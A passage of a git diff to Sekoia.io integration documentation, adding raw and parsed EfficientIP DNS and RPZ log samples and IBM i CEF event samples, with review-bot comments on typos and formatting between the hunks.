[ + "network" + ], + "dataset": "solidserver-ddi", + "type": [ + "info" + ] + }, + "client": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 63572 + }, + "dns": { + "answers": [ + { + "data": "1.2.3.4", + "ttl": 300, + "type": "A" + }, + { + "data": "1.2.3.4", + "ttl": 300, + "type": "A" + }, + { + "data": "HTTPS", + "ttl": 300, + "type": "RSSIG" + } + ], + "question": { + "class": "IN", + "name": "app.test.com.", + "registered_domain": "test.com", + "subdomain": "app", + "top_level_domain": "com", + "type": "A" + }, + "response_code": "NOERROR", + "type": "answer" + }, + "network": { + "transport": "udp" + }, + "observer": { + "vendor": "EfficientIp" + }, + "related": { + "hosts": [ + "app.test.com." 
+ ], + "ip": [ + "1.2.3.4" + ] + }, + "server": { + "ip": "1.2.3.4" + } + } + + ``` + + +=== "dns_named_query_cd.json" + + ```json + + { + "message": "client @0x7a4f3158 10.0.142.4#36506 (www.google.com): query: www.google.com IN A +E(0)CK (10.0.142.2)", + "event": { + "category": [ + "network" + ], + "dataset": "solidserver-ddi", + "type": [ + "info" + ] + }, + "client": { + "address": "10.0.142.4", + "ip": "10.0.142.4", + "port": 36506 + }, + "dns": { + "header_flags": [ + "CD", + "RD" + ], + "question": { + "class": "IN", + "name": "www.google.com", + "registered_domain": "google.com", + "subdomain": "www", + "top_level_domain": "com", + "type": "A" + }, + "type": "query" + }, + "network": { + "transport": "udp" + }, + "observer": { + "vendor": "EfficientIp" + }, + "related": { + "hosts": [ + "www.google.com" + ], + "ip": [ + "10.0.142.2", + "10.0.142.4" + ] + }, + "server": { + "ip": "10.0.142.2" + } + } + + ``` + + +=== "dns_named_query_dnssec.json" + + ```json + + { + "message": "client @0x81a97158 10.0.142.4#49968 (www.google.com): query: www.google.com IN A +E(0)DK (10.0.142.2)", + "event": { + "category": [ + "network" + ], + "dataset": "solidserver-ddi", + "type": [ + "info" + ] + }, + "client": { + "address": "10.0.142.4", + "ip": "10.0.142.4", + "port": 49968 + }, + "dns": { + "header_flags": [ + "RD" + ], + "question": { + "class": "IN", + "name": "www.google.com", + "registered_domain": "google.com", + "subdomain": "www", + "top_level_domain": "com", + "type": "A" + }, + "type": "query" + }, + "network": { + "transport": "udp" + }, + "observer": { + "vendor": "EfficientIp" + }, + "related": { + "hosts": [ + "www.google.com" + ], + "ip": [ + "10.0.142.2", + "10.0.142.4" + ] + }, + "server": { + "ip": "10.0.142.2" + } + } + + ``` + + +=== "dns_named_query_tcp.json" + + ```json + + { + "message": "client @0x7a532158 10.0.142.4#36995 (www.google.com): query: www.google.com IN A +E(0)TK (10.0.142.2)", + "event": { + "category": [ + "network" + ], + 
"dataset": "solidserver-ddi", + "type": [ + "info" + ] + }, + "client": { + "address": "10.0.142.4", + "ip": "10.0.142.4", + "port": 36995 + }, + "dns": { + "header_flags": [ + "RD" + ], + "question": { + "class": "IN", + "name": "www.google.com", + "registered_domain": "google.com", + "subdomain": "www", + "top_level_domain": "com", + "type": "A" + }, + "type": "query" + }, + "network": { + "transport": "tcp" + }, + "observer": { + "vendor": "EfficientIp" + }, + "related": { + "hosts": [ + "www.google.com" + ], + "ip": [ + "10.0.142.2", + "10.0.142.4" + ] + }, + "server": { + "ip": "10.0.142.2" + } + } + + ``` + + +=== "dns_refused.json" + + ```json + + { + "message": "REFUSED unexpected RCODE resolving 'api.example.com/A/IN': 5.6.7.8#53", + "event": { + "category": [ + "network" + ], + "dataset": "solidserver-ddi", + "outcome": "failure", + "reason": "unexpected RCODE", + "type": [ + "info" + ] + }, + "dns": { + "question": { + "class": "IN", + "name": "api.example.com", + "registered_domain": "example.com", + "subdomain": "api", + "top_level_domain": "com", + "type": "A" + }, + "type": "query" + }, + "network": { + "transport": "udp" + }, + "observer": { + "vendor": "EfficientIp" + }, + "related": { + "hosts": [ + "api.example.com" + ], + "ip": [ + "5.6.7.8" + ] + }, + "server": { + "ip": "5.6.7.8", + "port": 53 + } + } + + ``` + + +=== "dns_rssig_record.json" + + ```json + + { + "message": "client 172.16.2.36#61806 (id.hadron.ad.gt.): answer: id.hadron.ad.gt. IN TYPE65 (10.211.1.201) -> NOERROR 300 CNAME id.hadron.ad.gt.cdn.cloudflare.net. 300 HTTPS 1 . 
alpn=h2 ipv4hint=104.22.4.69,104.22.5.69,172.67.23.234 ipv6hint=2606:4700:10::6816:445,2606:4700:10::6816:545,2606:4700:10::ac43:17ea", + "event": { + "category": [ + "network" + ], + "dataset": "solidserver-ddi", + "type": [ + "info" + ] + }, + "client": { + "address": "172.16.2.36", + "ip": "172.16.2.36", + "port": 61806 + }, + "dns": { + "answers": [ + { + "data": "id.hadron.ad.gt.cdn.cloudflare.net.", + "ttl": 300, + "type": "CNAME" + }, + { + "data": "alpn=h2 ipv4hint=104.22.4.69,104.22.5.69,172.67.23.234 ipv6hint=2606:4700:10::6816:445,2606:4700:10::6816:545,2606:4700:10::ac43:17ea", + "ttl": 300, + "type": "HTTPS" + } + ], + "question": { + "class": "IN", + "name": "id.hadron.ad.gt.", + "registered_domain": "ad.gt", + "subdomain": "id.hadron", + "top_level_domain": "gt", + "type": "TYPE65" + }, + "response_code": "NOERROR", + "type": "answer" + }, + "network": { + "transport": "udp" + }, + "observer": { + "vendor": "EfficientIp" + }, + "related": { + "hosts": [ + "id.hadron.ad.gt." 
+ ], + "ip": [ + "10.211.1.201", + "172.16.2.36" + ] + }, + "server": { + "ip": "10.211.1.201" + } + } + + ``` + + +=== "test_rpz_notify.json" + + ```json + + { + "message": "zone rpz.ph.surbl.org/IN/outside: notify from 6.5.4.3#44152: serial 1720423233", + "event": { + "action": "notify", + "category": [ + "network" + ], + "dataset": "solidserver-ddi", + "reason": "serial 1720423233", + "type": [ + "info" + ] + }, + "dns": { + "type": "query" + }, + "efficientip": { + "rpz": { + "domain": "rpz.ph.surbl.org", + "query": { + "class": "IN" + }, + "view": "outside" + } + }, + "network": { + "transport": "udp" + }, + "observer": { + "vendor": "EfficientIp" + }, + "related": { + "ip": [ + "6.5.4.3" + ] + }, + "source": { + "address": "6.5.4.3", + "ip": "6.5.4.3", + "port": 44152 + } + } + + ``` + + +=== "test_rpz_qname.json" + + ```json + + { + "message": "client @0x8871827c 1.2.3.4#65213 (example.com): rpz QNAME Local-Data rewrite example.com/A/IN via example.com.fr", + "event": { + "category": [ + "network" + ], + "dataset": "solidserver-ddi", + "type": [ + "info" + ] + }, + "client": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "port": 65213 + }, + "dns": { + "type": "query" + }, + "efficientip": { + "rpz": { + "domain": "example.com", + "query": { + "class": "IN" + }, + "source": { + "name": "example.com.fr" + }, + "view": "A" + } + }, + "network": { + "transport": "udp" + }, + "observer": { + "vendor": "EfficientIp" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + } + } + + ``` + + +=== "test_rpz_refused.json" + + ```json + + { + "message": "zone rpz.ph.surbl.org/IN/outside: refused notify from non-master: 7507:2649:84be:353:95f9:eee1:65e9:44b4#47300", + "event": { + "action": "refused notify", + "category": [ + "network" + ], + "dataset": "solidserver-ddi", + "reason": "7507:2649:84be:353:95f9:eee1:65e9:44b4#47300", + "type": [ + "info" + ] + }, + "dns": { + "type": "query" + }, + "efficientip": { + "rpz": { + "domain": "rpz.ph.surbl.org", + "query": { + "class": 
"IN" + }, + "source": { + "name": "non-master" + }, + "view": "outside" + } + }, + "network": { + "transport": "udp" + }, + "observer": { + "vendor": "EfficientIp" + } + } + + ``` + + +=== "test_rpz_transfer_1.json" + + ```json + + { + "message": "transfer of 'rpz.ph.surbl.org/IN/outside' from 1.2.3.4#53: connected using 3.4.5.6#65242", + "event": { + "category": [ + "network" + ], + "dataset": "solidserver-ddi", + "reason": "connected using 3.4.5.6#65242", + "type": [ + "info" + ] + }, + "dns": { + "type": "query" + }, + "efficientip": { + "rpz": { + "domain": "rpz.ph.surbl.org", + "query": { + "class": "IN" + }, + "view": "outside" + } + }, + "network": { + "transport": "udp" + }, + "observer": { + "vendor": "EfficientIp" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "server": { + "ip": "1.2.3.4", + "port": 53 + } + } + + ``` + + +=== "test_rpz_transfer_2.json" + + ```json + + { + "message": "transfer of 'rpz.abuse.surbl.org/IN/dmz' from 1.2.3.4#53: Transfer status: success", + "event": { + "category": [ + "network" + ], + "dataset": "solidserver-ddi", + "reason": "Transfer status: success", + "type": [ + "info" + ] + }, + "dns": { + "type": "query" + }, + "efficientip": { + "rpz": { + "domain": "rpz.abuse.surbl.org", + "query": { + "class": "IN" + }, + "view": "dmz" + } + }, + "network": { + "transport": "udp" + }, + "observer": { + "vendor": "EfficientIp" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "server": { + "ip": "1.2.3.4", + "port": 53 + } + } + + ``` + + +=== "test_rpz_transfer_3.json" + + ```json + + { + "message": "transfer of 'rpz.cr.surbl.org/IN/dmz' from 1.2.3.4#53: Transfer completed: 1 messages, 8 records, 344 bytes, 0.026 secs (13230 bytes/sec) (serial 1720423198)", + "event": { + "category": [ + "network" + ], + "dataset": "solidserver-ddi", + "reason": "Transfer completed: 1 messages, 8 records, 344 bytes, 0.026 secs (13230 bytes/sec) (serial 1720423198)", + "type": [ + "info" + ] + }, + "dns": { + "type": "query" + }, + 
"efficientip": { + "rpz": { + "domain": "rpz.cr.surbl.org", + "query": { + "class": "IN" + }, + "view": "dmz" + } + }, + "network": { + "transport": "udp" + }, + "observer": { + "vendor": "EfficientIp" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "server": { + "ip": "1.2.3.4", + "port": 53 } } @@ -629,8 +1391,8 @@ The following table lists the fields that are extracted, normalized under the EC | Name | Type | Description | | ---- | ---- | ---------------------------| -|`@timestamp` | `date` | Date/time when the event originated. | |`client.ip` | `ip` | IP address of the client. | +|`client.port` | `long` | Port of the client. | |`dns.answers` | `object` | Array of DNS answers. | |`dns.header_flags` | `keyword` | Array of DNS header flags. | |`dns.question.class` | `keyword` | The class of records being queried. | 
@@ -640,14 +1402,23 @@ The following table lists the fields that are extracted, normalized under the EC |`dns.type` | `keyword` | The type of DNS event captured, query or answer. | |`efficientip.guardian_action` | `keyword` | EfficientIP Guardian action | |`efficientip.guardian_trigger_name` | `keyword` | Name of the EfficientIP Guardian trigger | +|`efficientip.list_names` | `array` | Names of the retrictions lists that matched the query | +|`efficientip.rpz.domain` | `keyword` | The domain of the rpz zone | +|`efficientip.rpz.query.class` | `keyword` | The query_class of the rpz request | +|`efficientip.rpz.source.name` | `keyword` | The name of the source of the rpz request | +|`efficientip.rpz.view` | `keyword` | The view of the rpz request | +|`efficientip.tag_names` | `array` | List of tags that matched the query | |`event.action` | `keyword` | The action captured by the event. | |`event.category` | `keyword` | Event category. The second categorization field in the hierarchy. | |`event.dataset` | `keyword` | Name of the dataset. | +|`event.outcome` | `keyword` | The outcome of the event. The lowest level categorization field in the hierarchy. | +|`event.reason` | `keyword` | Reason why this event happened, according to the source | |`event.type` | `keyword` | Event type. The third categorization field in the hierarchy. | -|`host.name` | `keyword` | Name of the host. | |`network.transport` | `keyword` | Protocol Name corresponding to the field `iana_number`. | |`observer.vendor` | `keyword` | Vendor name of the observer. | |`server.ip` | `ip` | IP address of the server. | +|`server.port` | `long` | Port of the server. | +|`source.ip` | `ip` | IP address of the source. | |`source.port` | `long` | Port of the source. | 
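Review bot: The two table hunks drop `@timestamp` and `host.name` from the extracted-fields list, which lines up with the syslog prefix (`Nov 6 14:06:24 0dl10sds named[14006]:`) being removed from the raw samples in the companion `_sample.md` change; if that header is now stripped before the parser runs, the intro should say so, because the remaining message text carries neither the event time nor the resolver host. Two smaller points in the `@@ -640` hunk: `retrictions lists` should read `restriction lists`, and `efficientip.list_names` / `efficientip.tag_names` are typed `array`, a type used nowhere else in the table (the other multi-valued fields such as `dns.header_flags` and `dns.answers` are listed as `keyword` and `object`).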
diff --git a/_shared_content/operations_center/integrations/generated/f95fea50-533c-4897-9272-2f8361e63644_sample.md b/_shared_content/operations_center/integrations/generated/f95fea50-533c-4897-9272-2f8361e63644_sample.md index 4b439c9a5c..179114150b 100644 --- a/_shared_content/operations_center/integrations/generated/f95fea50-533c-4897-9272-2f8361e63644_sample.md +++ b/_shared_content/operations_center/integrations/generated/f95fea50-533c-4897-9272-2f8361e63644_sample.md @@ -4,10 +4,26 @@ In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. +=== "dns_format_error" + + ``` + DNS format error from 7507:2649:84be:353:95f9:eee1:65e9:44b4#53 resolving ejp.rlcdn.com/AAAA for 1.2.3.4#55198: Name rlcdn.com (SOA) not subdomain of zone ejp.rlcdn.com -- invalid response + ``` + + + +=== "dns_formerr" + + ``` + FORMERR resolving 'api.example.com/AAAA/IN': 1111:2222:3333:4444::1#53 + ``` + + + === "dns_guardian_answer1" ``` - Nov 6 13:43:39 doh-2eu-guardian named[74943]: client 10.242.101.27#46671 (meet.google.com.): answer: meet.google.com. IN TYPE65 (10.242.101.187) -> NOERROR + client 10.242.101.27#46671 (meet.google.com.): answer: meet.google.com. IN TYPE65 (10.242.101.187) -> NOERROR ``` 
@@ -15,7 +31,7 @@ In this section, you will find examples of raw logs as generated natively by the === "dns_guardian_answer2" ``` - Nov 6 13:44:56 doh-2eu-guardian named[74943]: client 10.242.101.27#34229 (community.efficientip.com.): answer: community.efficientip.com. IN A (10.242.101.187) -> NOERROR 474 CNAME eip-community.hosted-by-discourse.com. 174 A 184.104.178.47 + client 10.242.101.27#34229 (community.efficientip.com.): answer: community.efficientip.com. IN A (10.242.101.187) -> NOERROR 474 CNAME eip-community.hosted-by-discourse.com. 174 A 184.104.178.47 ``` @@ -23,7 +39,7 @@ In this section, you will find examples of raw logs as generated natively by the === "dns_guardian_arming" ``` - Oct 3 18:23:27 doh-2eu-guardian named[74943]: ARMING trigger on 37.169.153.147.f6:ec:1e:e3:7a:b1.ei6pt (action:QUARANTINE) (Suspicious Behavior) + ARMING trigger on 37.169.153.147.f6:ec:1e:e3:7a:b1.ei6pt (action:QUARANTINE) (Suspicious Behavior) ``` @@ -31,7 +47,23 @@ In this section, you will find examples of raw logs as generated natively by the === "dns_guardian_disarming" ``` - Oct 3 18:24:28 doh-2eu-guardian named[74943]: DISARMING trigger on 37.169.153.147.f6:ec:1e:e3:7a:b1.ei6pt (action:QUARANTINE) (Suspicious Behavior) + DISARMING trigger on 37.169.153.147.f6:ec:1e:e3:7a:b1.ei6pt (action:QUARANTINE) (Suspicious Behavior) + ``` + + + +=== "dns_guardian_listlog" + + ``` + List Matched 192.168.1.226#32622: query: www.combatcorner.com IN A (192.168.1.209) {DTP} [phishing,active30] + ``` + + + +=== "dns_guardian_listlog2" + + ``` + List Matched 192.168.1.226#46937: query: www.dsmqlkdsq.com IN A (192.168.1.209) {DTP,internal_clients} ``` @@ -39,7 +71,7 @@ In this section, you will find examples of raw logs as generated natively by the === "dns_guardian_query1" ``` - Nov 6 13:43:39 doh-2eu-guardian named[74943]: client 10.242.101.27#46671: query: meet.google.com IN TYPE65 (10.242.101.187) + client 10.242.101.27#46671: query: meet.google.com IN TYPE65 (10.242.101.187) ``` 
@@ -47,7 +79,15 @@ In this section, you will find examples of raw logs as generated natively by the === "dns_guardian_query2" ``` - Nov 6 13:44:56 doh-2eu-guardian named[74943]: client 10.242.101.27#34229: query: community.efficientip.com IN A (10.242.101.187) + client 10.242.101.27#34229: query: community.efficientip.com IN A (10.242.101.187) + ``` + + + +=== "dns_https_record" + + ``` + 26914:client 1.2.3.4#52283 (cdnjs.cloudflare.com.): answer: cdnjs.cloudflare.com. IN TYPE65 (5.6.7.8) -> NOERROR 205 HTTPS 1 . alpn=h3,h2 ipv4hint=104.17.24.14,104.17.25.14 ipv6hint=2606:4700::6811:180e,2606:4700::6811:190e 205 RRSIG HTTPS 13 ``` @@ -55,7 +95,23 @@ In this section, you will find examples of raw logs as generated natively by the === "dns_named_query" ``` - Nov 6 14:06:24 0dl10sds named[14006]: client @0x7ee2b158 10.0.142.4#39897 (www.google.com): query: www.google.com IN A +E(0)K (10.0.142.2) + client @0x7ee2b158 10.0.142.4#39897 (www.google.com): query: www.google.com IN A +E(0)K (10.0.142.2) + ``` + + + +=== "dns_named_query_1" + + ``` + client @0x7ee2b158 1.2.3.4#50426: updating zone 'test.fr/IN': deleting rrset at 'test.test.fr' AAAA + ``` + + + +=== "dns_named_query_2" + + ``` + client 1.2.3.4#63572 (app.test.com.): answer: app.test.com. IN A (1.2.3.4) -> NOERROR 300 A 1.2.3.4 300 A 1.2.3.4 300 RRSIG A 13 3 300 20240815085545 20240813065545 34505 test.com. xxxxxxxxxxxxx ``` @@ -63,7 +119,7 @@ In this section, you will find examples of raw logs as generated natively by the === "dns_named_query_cd" ``` - Nov 6 14:08:18 0dl10sds named[14006]: client @0x7a4f3158 10.0.142.4#36506 (www.google.com): query: www.google.com IN A +E(0)CK (10.0.142.2) + client @0x7a4f3158 10.0.142.4#36506 (www.google.com): query: www.google.com IN A +E(0)CK (10.0.142.2) ``` 
@@ -71,7 +127,7 @@ In this section, you will find examples of raw logs as generated natively by the === "dns_named_query_dnssec" ``` - Nov 6 14:09:07 0dl10sds named[14006]: client @0x81a97158 10.0.142.4#49968 (www.google.com): query: www.google.com IN A +E(0)DK (10.0.142.2) + client @0x81a97158 10.0.142.4#49968 (www.google.com): query: www.google.com IN A +E(0)DK (10.0.142.2) ``` 
@@ -79,7 +135,71 @@ In this section, you will find examples of raw logs as generated natively by the === "dns_named_query_tcp" ``` - Nov 6 14:04:34 0dl10sds named[14006]: client @0x7a532158 10.0.142.4#36995 (www.google.com): query: www.google.com IN A +E(0)TK (10.0.142.2) + client @0x7a532158 10.0.142.4#36995 (www.google.com): query: www.google.com IN A +E(0)TK (10.0.142.2) + ``` + + + +=== "dns_refused" + + ``` + REFUSED unexpected RCODE resolving 'api.example.com/A/IN': 5.6.7.8#53 + ``` + + + +=== "dns_rssig_record" + + ``` + client 172.16.2.36#61806 (id.hadron.ad.gt.): answer: id.hadron.ad.gt. IN TYPE65 (10.211.1.201) -> NOERROR 300 CNAME id.hadron.ad.gt.cdn.cloudflare.net. 300 HTTPS 1 . alpn=h2 ipv4hint=104.22.4.69,104.22.5.69,172.67.23.234 ipv6hint=2606:4700:10::6816:445,2606:4700:10::6816:545,2606:4700:10::ac43:17ea + ``` + + + +=== "test_rpz_notify" + + ``` + zone rpz.ph.surbl.org/IN/outside: notify from 6.5.4.3#44152: serial 1720423233 + ``` + + + +=== "test_rpz_qname" + + ``` + client @0x8871827c 1.2.3.4#65213 (example.com): rpz QNAME Local-Data rewrite example.com/A/IN via example.com.fr + ``` + + + +=== "test_rpz_refused" + + ``` + zone rpz.ph.surbl.org/IN/outside: refused notify from non-master: 7507:2649:84be:353:95f9:eee1:65e9:44b4#47300 + ``` + + + +=== "test_rpz_transfer_1" + + ``` + transfer of 'rpz.ph.surbl.org/IN/outside' from 1.2.3.4#53: connected using 3.4.5.6#65242 + ``` + + + +=== "test_rpz_transfer_2" + + ``` + transfer of 'rpz.abuse.surbl.org/IN/dmz' from 1.2.3.4#53: Transfer status: success + ``` + + + +=== "test_rpz_transfer_3" + + ``` + transfer of 'rpz.cr.surbl.org/IN/dmz' from 1.2.3.4#53: Transfer completed: 1 messages, 8 records, 344 bytes, 0.026 secs (13230 bytes/sec) (serial 1720423198) ``` diff --git a/_shared_content/operations_center/integrations/generated/fc03f783-5039-415e-915a-a4b010d9a872.md b/_shared_content/operations_center/integrations/generated/fc03f783-5039-415e-915a-a4b010d9a872.md index 24a4d237a6..cf48a096bd 100644 
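Review bot: Every modified sample in this file loses its syslog header (`Nov 6 13:43:39 doh-2eu-guardian named[74943]: `), so the raw-event examples no longer show where a timestamp or host would come from; if the collector strips that prefix before parsing, the intro sentence should state it, otherwise the examples no longer match what integrators will see on the wire. Among the added tabs, `dns_https_record` keeps a `26914:` prefix that none of the other samples carry and that looks like a leftover line number or PID, and `dns_rssig_record` should be named `dns_rrsig_record` to match the `RRSIG` record type it illustrates.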
--- a/_shared_content/operations_center/integrations/generated/fc03f783-5039-415e-915a-a4b010d9a872.md +++ b/_shared_content/operations_center/integrations/generated/fc03f783-5039-415e-915a-a4b010d9a872.md @@ -1,5 +1,5 @@ -## Event Categories +### Event Categories The following table lists the data source offered by this integration. @@ -25,10 +25,9 @@ In details, the following table denotes the type of events produced by this inte -## Event Samples - -Find below few samples of events and how they are normalized by Sekoia.io. +### Transformed Events Samples after Ingestion +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "cpc1126_1.json" @@ -712,7 +711,7 @@ Find below few samples of events and how they are normalized by Sekoia.io. -## Extracted Fields +### Extracted Fields The following table lists the fields that are extracted, normalized under the ECS format, analyzed and indexed by the parser. It should be noted that infered fields are not listed. @@ -742,3 +741,6 @@ The following table lists the fields that are extracted, normalized under the EC |`source.port` | `long` | Port of the source. | |`user.name` | `keyword` | Short name or login of the user. | + + +For more information on the Intake Format, please find the code of the Parser, Smart Descriptions, and Supported Events [here](https://github.com/SEKOIA-IO/intake-formats/tree/main/IBM/ibm_i). \ No newline at end of file 
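Review bot: The new closing line (`For more information on the Intake Format ...`) is committed without a terminating newline (`\ No newline at end of file`); add one so the generated page matches the other integration files and keeps later diffs clean. The heading demotion from `##` to `###` and the removal of the `/docs/` link prefix are consistent with the rest of this change.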
diff --git a/_shared_content/operations_center/integrations/generated/fc03f783-5039-415e-915a-a4b010d9a872_sample.md b/_shared_content/operations_center/integrations/generated/fc03f783-5039-415e-915a-a4b010d9a872_sample.md new file mode 100644 index 0000000000..b0ae426cde --- /dev/null +++ b/_shared_content/operations_center/integrations/generated/fc03f783-5039-415e-915a-a4b010d9a872_sample.md 
@@ -0,0 +1,126 @@ + +### Raw Events Samples + +In this section, you will find examples of raw logs as generated natively by the source. These examples are provided to help integrators understand the data format before ingestion into Sekoia.io. It is crucial for setting up the correct parsing stages and ensuring that all relevant information is captured. + + +=== "cpc1126_1" + + ``` + CEF:0|IBM|IBM i|7.3|QSYS-QHST|CPC1126|Low|act=CodeSample reason=CPC1126 msg=The user QSYSOPR has stopped the job 080352/QTMHHTTP/ADMIN. suser=QSYSOPR sproc=086157/QSYSOPR/UPSA_QHTTP shost=EXPC3 + ``` + + + +=== "cpc1126_2" + + ``` + CEF:0|IBM|IBM i|7.3|QSYS-QHST|CPC1126|Low|reason=CPC1126 msg=L'utilisateur QSYSOPR a arrĂȘt{ le travail 080352/QTMHHTTP/ADMIN. suser=QSYSOPR sproc=086157/QSYSOPR/UPSA_QHTTP shost=EXPC3 + ``` + + + +=== "cpf0907" + + ``` + CEF:0|IBM|IBM i|7.4|MSGMON|CPF0907|5|cat=MSG Queue Messages rt=2020-04-30-11.35.29.886549 reason=CPF0907 cs1Label=msgSev cs1=ERROR cs2Label=msgQueue cs2=QSYS/QSYSOPR cs3Label=pgmName cs3=QWCATARE msg=Serious storage condition may exist. Press HELP. cs4Label=srdb cs4=I5OSP4 suser=QSYS sproc=541034/QSYS/QSYSARB5 shost=I5OSP4 + ``` + + + +=== "cpf0927" + + ``` + CEF:0|IBM|IBM i|7.3|QSYS-QHST|CPF0927|Low|reason=CPF0927 msg=Subsystem QBATCH stopped suser=QSYS sproc=080211/QSYS/QSYSARB4 shost=EXPC3 + ``` + + + +=== "cpf1124_1" + + ``` + CEF:0|IBM|IBM i|7.4|QSYS-QHST|CPF1124|Low|reason=CPF1124 msg=Job 722506/QZRDSRMOWN/SLMSQMONS started on 25.08.20 at 18:59:04 in subsystem SLSBS in QZRDSECSRM. Job entered system on 25.08.20 at 18:59:04. suser=QZRDSRMOWN sproc=722506/QZRDSRMOWN/SLMSQMONS shost=EXPC3 + ``` + + + +=== "cpf1124_2" + + ``` + CEF:0|IBM|IBM i|7.3|QSYS-QHST|CPF1124|Low|reason=CPF1124 msg=Travail 086167/QZRDSRMOWN/SLMSQMONS d{marr{ le 12/03/24 @ 02:08:51 dans le sous-syst}me SLSBS de QZRDSECSRM ; soumis le 12/03/24 @ 02:08:51. 
suser=QZRDSRMOWN sproc=086167/QZRDSRMOWN/SLMSQMONS shost=EXPC3 + ``` + + + +=== "cpf1164_1" + + ``` + CEF:0|IBM|IBM i|7.3|QSYS-QHST|CPF1164|High|reason=CPF1164 msg=Job 111111/JDOE/JPRC stopped at 12/03/24 @ 02:06:54; UC time 0,002; exit code 123 . suser=JDOE sproc=111111/JDOE/JPRC shost=EXPC3 + ``` + + + +=== "cpf1164_2" + + ``` + CEF:0|IBM|IBM i|7.3|QSYS-QHST|CPF1164|High|reason=CPF1164 msg=Travail 080694/QSPLJOB/RMTW000008 arrĂȘt{ le 12/03/24 @ 02:05:56; temps UC 0,005; code fin 50 . suser=QSPLJOB sproc=080694/QSPLJOB/RMTW000008 shost=EXPC3 + ``` + + + +=== "cpi3e34_1" + + ``` + CEF:0|IBM|IBM i|7.3|QSYS-QHST|CPI3E34|Low|reason=CPI3E34 msg=User QBRMS, client 192.168.242.20, was connected to the job 086171/QUSER/QRWTSRVR in the subsystem QSYSWRK, QSYS, 12/03/24, 02:16:22. suser=QBRMS sproc=086171/QUSER/QRWTSRVR shost=EXPC3 + ``` + + + +=== "cpi3e34_2" + + ``` + CEF:0|IBM|IBM i|7.3|QSYS-QHST|CPI3E34|Low|reason=CPI3E34 msg=L'utilisateur QBRMS, client 192.168.242.20, est connect{ au travail 086171/QUSER/QRWTSRVR dans le sous-syst}me QSYSWRK, QSYS, 12/03/24, 02:16:22. 
suser=QBRMS sproc=086171/QUSER/QRWTSRVR shost=EXPC3 + ``` + + + +=== "db2mon" + + ``` + CEF:0|IBM|IBM i|7.4|DB2MON|DB2 change monitoring (Journal Extract Tool)|3|act=UPDATE rt=2020-04-30-12.11.52.265056 sproc=551907/BARLEN/QPADEV000D shost=I5OSP4 suser=BARLEN fname=QZRDSECSRM/SLTHSTENT cs1Label=pgmName cs1=CFGSLHSTP cs2Label=updatedColumnNames cs2=EVTUSER1,EVTMSGID1,EVTMSGID2,EVTMSGID3 cs5Label=rowDataBefore cs5=QJ_JOURNAL_ENTRY_TYPE\="UB" QJ_RECEIVER_NAME\="DETRCV0010" QJ_SEQUENCE_NUMBER\="22145" EVTUSER1\="BARLEN" EVTMSGID1\="CPF1122" EVTMSGID2\="CPF9998" EVTMSGID3\="SLS0040" cs4Label=rowDataAfter cs4=QJ_JOURNAL_ENTRY_TYPE\="UP" QJ_RECEIVER_NAME\="DETRCV0010" QJ_SEQUENCE_NUMBER\="22146" EVTUSER1\="BARLEN3" EVTMSGID1\="CPF1129" EVTMSGID2\="CPF9997" EVTMSGID3\="SLS0042" + ``` + + + +=== "isfmon" + + ``` + CEF:0|IBM|IBM i|7.4|IFSMON|IFS File Monitor Journal Entry Type B-WA|3|act=B-WA Write, after-image event sproc=722496/BARLEN/QZSHSH suser=BARLEN shost=CTCSECT5 filePath=/home/barlen/ifsmon/weblog2.log fileType=*STMF cs2Label=changedDataLength cs2=0000000064 cs3Label=changedDataPart cs3=*ONLY cs4Label=changedDataFileOffset cs4=00000000000000788915 cs1Label=changedData cs1=Unauthorized access to Web resource accountInfo by user TBARLEN + ``` + + + +=== "taf" + + ``` + CEF:0|IBM|IBM i|7.4|QSYS-QAUDJRN|T-AF|Medium|reason=Authority failure msg=Not authorized to object fileType=*PGM cs1Label=objName cs1=QZRDSECSRM/CFGJSCR suser=THOMAS sproc=722470/THOMAS/QPADEV000P shost=I5OSP4 src=192.168.126.71 spt=36868 evtAggregation=*NO entryTypeField=A + ``` + + + +=== "tcd" + + ``` + CEF:0|IBM|IBM i|7.4|QSYS-QAUDJRN|T-CD|Low|reason=Command string audit msg=Command run interactively from a command line or by choosing a menu option that runs a CL command - CHGENVVAR ENVVAR(test4) VALUE(77777) LEVEL(*SYS) fileType=*CMD cs1Label=objName cs1=QSYS/CHGENVVAR suser=BARLEN sproc=721738/BARLEN/QPADEV000Q shost=I5OSP4 src=192.168.126.71 spt=36888 evtAggregation=*NO entryTypeField=C + ``` + + 
+ +=== "tcp2617" + + ``` + CEF:0|IBM|IBM i|7.3|QSYS-QHST|TCP2617|Low|reason=TCP2617 msg=TCP/IP connection to remote system 10.1.43.58 closed, reason code 1. suser=QSYS sproc=080247/QSYS/QTCPWRK shost=EXPC3 + ``` + + + diff --git a/_shared_content/operations_center/integrations/generated/fc99c983-3e6c-448c-97e6-7e0948e12415.md b/_shared_content/operations_center/integrations/generated/fc99c983-3e6c-448c-97e6-7e0948e12415.md index b436630489..6c18e52fd2 100644 --- a/_shared_content/operations_center/integrations/generated/fc99c983-3e6c-448c-97e6-7e0948e12415.md +++ b/_shared_content/operations_center/integrations/generated/fc99c983-3e6c-448c-97e6-7e0948e12415.md 
@@ -25,7 +25,77 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection 